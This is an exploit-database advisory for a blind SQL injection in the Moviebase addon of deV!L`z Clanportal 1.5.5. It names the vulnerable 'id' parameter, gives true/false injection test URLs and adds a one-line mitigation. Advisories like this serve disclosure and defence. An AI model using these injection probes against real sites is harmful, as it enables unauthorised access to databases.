header-logo
Suggest Exploit
vendor:
deV!L`z Clanportal 1.5.5 Moviebase
by:
Easy Laster
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: deV!L`z Clanportal 1.5.5 Moviebase
Affected Version From: 1.5.5
Affected Version To: 1.5.5
Patch Exists: N/A
Related CWE: N/A
CPE: a:devilzclan:devilz_clanportal:1.5.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability

deV!L`z Clanportal 1.5.5 Moviebase Addon is vulnerable to Blind SQL Injection. The vulnerability exists in the 'movies/index.php?action=showkat&id=' parameter. An attacker can inject malicious SQL queries to the vulnerable parameter and gain access to the database. The SQL Injection Filter Function must be bypassed in order to exploit the vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

========================================================================================                 
| # Title    : deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability         
| # Author   : Easy Laster                                                                               
| # Download : http://www.modsbar.de/Addons/79/moviebase/
| # Script   : deV!L`z Clanportal 1.5.5 Moviebase     
| # Price    : 20€
| # Bug      : Blind SQL Injection   
| # Date     : 12.01.2012
| # Language : PHP
| # Status   : vulnerable/Non-Public
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah                                                               
======================        Proof of Concept         =================================
[+] Vulnerability

    movies/index.php?action=showkat&id=

[+] Injectable

    #true

    http://[host]/[path]/movies/index.php?action=showkat&id=1+and+1=1--+


    #false   

    http://[host]/[path]/movies/index.php?action=showkat&id=1+and+1=2--+

[-] The SQL Injection Filter Function must be bypassed  ()

Navigation

Suggest Exploit

Services By CQR